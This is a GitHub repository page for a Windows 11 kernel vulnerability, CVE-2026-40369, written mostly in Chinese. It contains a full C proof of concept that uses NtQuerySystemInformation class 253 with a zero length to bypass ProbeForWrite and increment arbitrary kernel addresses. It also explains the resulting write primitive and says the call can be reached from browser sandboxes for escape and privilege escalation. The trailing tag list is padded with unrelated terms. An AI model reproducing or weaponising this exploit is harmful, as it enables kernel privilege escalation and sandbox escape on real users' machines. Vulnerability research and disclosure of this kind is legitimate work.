orinimron123/CVE-2026-40369-EXPLOIT
GitHub: orinimron123/CVE-2026-40369-EXPLOIT
针对Windows内核NtQuerySystemInformation任意地址递增漏洞的完整利用代码,可从浏览器渲染进程沙箱中实现逃逸并获取内核写入原语。
Stars: 225 | Forks: 51
# CVE-2026-40369:通过 NtQuerySystemInformation (Class 253) 实现任意内核地址递增
## 概要
- **类型:** 任意内核写入(递增) — 权限提升原语
- **组件:** ntoskrnl.exe — `ExpGetProcessInformation`
- **触发方式:** `NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)`
- **影响:** 任何非特权进程均可进行任意内核地址递增(写入原语)
- **可从 Chrome 沙箱触发:** 是(NtQuerySystemInformation 未被拦截)
- **受影响 Windows 版本:** Windows 11 24H2-25H2
- **漏洞利用可靠性:** 100% 确定性
- **KASLR 绕过可与 prefetch tool 组合使用:**
#include
#pragma comment(lib, "ntdll.lib")
typedef long NTSTATUS;
#define SystemProcessInformationExtension 253
typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
int main(void)
{
PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");
if (!pNtQSI) {
printf("[-] Failed to resolve NtQuerySystemInformation\n");
return 1;
}
PVOID target = (PVOID)0xffff800041424344ULL;
printf("[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n");
printf("[*] Target kernel address: %p\n", target);
printf("[*] Will write:\n");
printf(" [target+0] += num_processes (DWORD increment)\n");
printf(" [target+4] += total_threads (DWORD add)\n");
printf(" [target+8] += total_handles (DWORD add)\n");
printf("\n");
printf("[!] This WILL bugcheck if the address is not mapped writable memory.\n");
printf("[*] Press Enter to trigger...\n");
getchar();
ULONG needed = 0;
NTSTATUS status = pNtQSI(
SystemProcessInformationExtension,
target, /* kernel address — ProbeForWrite skipped because Length=0 */
0, /* Length=0 bypasses ProbeForWrite entirely */
&needed
);
printf("[*] NtQuerySystemInformation returned: 0x%08lX\n", status);
printf("[*] Required length: %lu\n", needed);
printf("[+] Done. If you see this, the writes succeeded without bugcheck.\n");
return 0;
}
```
## 可利用性评估 — 任意内核写入
### ProbeForWrite 绕过
`ExpQuerySystemInformation` 在分发之前会调用 `ProbeForWrite(buffer, Length, alignment)`。
**当 Length=0 时,ProbeForWrite 完全是一个空操作 (NO-OP)** — 整个函数体由 `if (Length)` 控制执行。
因此:`NtQuerySystemInformation(253, arbitraryKernelAddr, 0, &needed)` 会将未经验证的内核指针直接传递给 `ExpGetProcessInformation`。
### 写入原语
对于系统上的每个进程,该函数都会执行:
```
v95 = userBuffer; // attacker-controlled pointer, NOT validated for class 253 with Length=0
// For EACH process:
++*v95; // *(uint32*)(addr+0) += 1
v95[1] += threadCnt; // *(uint32*)(addr+4) += process_active_thread_count
v95[2] += handleCnt; // *(uint32*)(addr+8) += process_handle_count
```
这会导致:
- **addr+0:** 每个进程递增 1 → 总计 = 系统上的进程数量
- **addr+4:** 所有进程的线程数总和
- **addr+8:** 所有进程的句柄数总和
### 为什么在 LENGTH=0 的情况下依然会发生写入
`ExpGetProcessInformation` 会检查 `if (length < 12)` 并设置 STATUS_INFO_LENGTH_MISMATCH,但**不会提前返回**。它存储了错误状态并继续进入进程迭代循环,在最终返回错误状态之前,对每个进程都执行对 `v95` 的写入。
### 可从 Chrome 沙箱、Edge、Firefox 中触发
完全可达:
- NtQuerySystemInformation 未被 win32k lockdown 阻止
- 受限令牌 (restricted token) 并不能阻止此系统调用
- 不受信任的完整性级别 (Untrusted integrity level) 并不能阻止此系统调用
## 贡献者
由 Ori Nimron (@orinimron123) 发现并撰写
标签:0day, 0day挖掘, Awesome列表, Chrome沙箱, CISA项目, CVE-2026-40369, EDR绕过, KASLR绕过, ntoskrnl.exe, NtQuerySystemInformation, Web报告查看器, Windows 11, Windows内核, 任意地址写, 内核安全, 协议分析, 提权漏洞, 权限提升, 沙箱逃逸, 白帽子, 缓冲区溢出, 网络安全, 隐私保护, 高交互蜜罐